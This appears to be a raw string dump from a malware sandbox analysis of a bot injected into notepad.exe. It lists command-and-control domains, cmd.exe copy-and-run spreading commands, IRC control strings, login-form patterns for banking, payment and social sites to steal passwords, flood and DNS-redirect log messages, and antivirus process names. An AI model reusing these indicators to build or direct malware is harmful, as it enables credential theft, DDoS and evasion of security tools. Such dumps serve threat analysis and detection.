the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre><b>notepad.exe_1520_rwx_000A0000_00029000:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>a.aiphon1egalaxyblack42.com</pre><pre>a.ajjjqws1fkxx42.com</pre><pre>a.adoyou1understandme42.com</pre><pre>a.amous1epadsafa42.com</pre><pre>a.acaraka1lagroup42.com</pre><pre>a.aire1bobohayawen42.com</pre><pre>a.ajhvdqw1ladies42.com</pre><pre>a.biphon2egalaxyblack42.com</pre><pre>a.bmous2epadsafa42.com</pre><pre>a.bcaraka2lagroup42.com</pre><pre>a.anabok1hasn1aser42.com</pre><pre>a.athemall1gonowhaha42.com</pre><pre>a.bdoyou2understandme42.com</pre><pre>a.bnabok2hasn1aser42.com</pre><pre>a.bjjjqws2fkxx42.com</pre><pre>a.bjhvdqw2ladies42.com</pre><pre>a.bthemall2gonowhaha42.com</pre><pre>a.bire2bobohayawen42.com</pre><pre>a.cdoyou3understandme42.com</pre><pre>a.cmous3epadsafa42.com</pre><pre>a.dmous4epadsafa42.com</pre><pre>a.ciphon3egalaxyblack42.com</pre><pre>a.cnabok3hasn1aser42.com</pre><pre>a.cire3bobohayawen42.com</pre><pre>a.cthemall3gonowhaha42.com</pre><pre>a.cjhvdqw3ladies42.com</pre><pre>a.cjjjqws3fkxx42.com</pre><pre>a.ccaraka3lagroup42.com</pre><pre>a.diphon4egalaxyblack42.com</pre><pre>a.ddoyou4understandme42.com</pre><pre>a.dnabok4hasn1aser42.com</pre><pre>a.dire4bobohayawen42.com</pre><pre>a.djjjqws4fkxx42.com</pre><pre>a.djhvdqw4ladies42.com</pre><pre>a.dthemall4gonowhaha42.com</pre><pre>a.edoyou5understandme42.com</pre><pre>a.dcaraka4lagroup42.com</pre><pre>a.emous5epadsafa42.com</pre><pre>a.ecaraka5lagroup42.com</pre><pre>a.eiphon5egalaxyblack42.com</pre><pre>a.enabok5hasn1aser42.com</pre><pre>a.eire5bobohayawen42.com</pre><pre>a.ejjjqws5fkxx42.com</pre><pre>a.ejhvdqw5ladies42.com</pre><pre>a.ethemall5gonowhaha42.com</pre><pre>a.roooggeyyy2.com</pre><pre>a.roooggeyyy3.com</pre><pre>a.roooggeyyy4.com</pre><pre>a.so1aa00.com</pre><pre>a.saao20000.com</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>notepad.exe_1520_rwx_008B0000_00027000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>PSSVSSh</pre><pre>RPVSSh</pre><pre>PSSh(</pre><pre>PSSh#</pre><pre>PSSh'</pre><pre>PSSh&</pre><pre>PSSh*</pre><pre>9p.uV</pre><b>notepad.exe_1520_rwx_008D8000_00072000:</b><pre>Opera/9.00 (Windows NT 5.1; U; en)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)</pre><pre>Opera 9.4 (Windows NT 6.1; U; en)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)</pre><pre>Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)</pre><pre>SbieDll.dll</pre><pre>Software\Classes\CLSID\%s\X</pre><pre>Software\Classes\CLSID\%s\X\%s</pre><pre>0xX</pre><pre>SB:0xX</pre><pre>G:%s_0xX_%c:%s_v1$</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u</pre><pre>IEXPLORE.EXE</pre><pre>IE.HTTP</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>IE.HTTPS</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>IE.AssocFile.HTM</pre><pre>HTTP\shell\open\command</pre><pre>Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s</pre><pre>Psapi.dll</pre><pre>%s\%s</pre><pre>Software\Adobe\Acrobat Reader\%s\Privileged</pre><pre>mscoree.dll</pre><pre>HARDWARE\DESCRIPTION\System\CentralProcessor\%u</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>nspr4.dll</pre><pre>nss3.dll</pre><pre>Urlmon.dll</pre><pre>URLDownloadToFileW</pre><pre>Netapi32.dll</pre><pre>76487-640-1457236-23837</pre><pre>76487-337-8429955-22614</pre><pre>76487-644-3177037-23510</pre><pre>76497-640-6308873-23835</pre><pre>55274-640-2673064-23950</pre><pre>76487-640-8834005-23195</pre><pre>76487-640-0716662-23535</pre><pre>76487-644-8648466-23106</pre><pre>00426-293-8170032-85146</pre><pre>76487-341-5883812-22420</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup</pre><pre>{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}</pre><pre>snxhk.dll</pre><pre>comctl32.dll</pre><pre>ZwSetValueKey</pre><pre>ZwDeleteValueKey</pre><pre>SOFTWARE\%s</pre><pre>update.microsoft.com</pre><pre>microsoft.com</pre><pre>windowsupdate.microsoft.com</pre><pre>JOIN</pre><pre>PRIVMSG</pre><pre>.rdata</pre><pre>cmd_option.%s</pre><pre>/c %s</pre><pre>cmd.exe</pre><pre>msvcrt.dll</pre><pre>--x-x-x-xx</pre><pre>Content-Type: multipart/form-data; boundary=x-x-x-xx</pre><pre>Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"</pre><pre>%s?action=up&g=%s</pre><pre>xul.dll</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>?pid=%d</pre><pre>?page=%d</pre><pre>?id=%u</pre><pre>%s=%u&%s=%s</pre><pre>%s=%s&%s=%u</pre><pre>&%s=%s</pre><pre>&%s%u=</pre><pre>&%s%hu=</pre><pre>&%s=_%u</pre><pre>%d|%s|%s|%s</pre><pre>.info</pre><pre>httpget</pre><pre>GET /%s HTTP/1.1</pre><pre>Host: %s</pre><pre>Content-Length: %d</pre><pre>Accept: %s</pre><pre>Accept-Language: %s</pre><pre>Accept-Charset: %s</pre><pre>Accept-Encoding: %s</pre><pre>User-Agent: %s</pre><pre>Referer: %s</pre><pre>Connection: %s</pre><pre>http://</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>tbb-firefox.exe</pre><pre>%s:%hu</pre><pre>windowsupdate</pre><pre>SSH2_MSG_KEXINIT</pre><pre>SSH2_MSG_DISCONNECT</pre><pre>SSH2_MSG_USERAUTH_SUCCESS</pre><pre>http://%s%s/image.php?id=%s</pre><pre>TaskDialogIndirect</pre><pre>http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535</pre><pre>ÐxX</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>secur32.dll</pre><pre>crypt32.dll</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>wininet.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>ole32.dll</pre><pre>version.dll</pre><pre>sfc.dll</pre><pre>dnsapi.dll</pre><pre>ws2_32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>8"808]9|9</pre><pre>9%9 919<9</pre><pre>=(=/=6==={=</pre><pre>4 4?4^4}4</pre><pre>6o6g6r6w6</pre><pre>9 9$9(90949</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>This pointer, %d, is aligned on %d</pre><pre>This pointer, %d, is not aligned on %d</pre><pre>%f, %f and %f form a right-angled triangle.</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>?#%X.y</pre><pre>%S#[k</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>GetWindowsDirectoryA</pre><pre>CreatePipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>.VI3xqr</pre><pre>zcÁ</pre><pre>Udp?iw0</pre><pre>/#"%f</pre><pre>P.oUw</pre><pre>B%Su[</pre><pre>Rkka.by</pre><pre>.dYi'</pre><pre>p.Cvq</pre><pre>.EU{%</pre><pre>D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</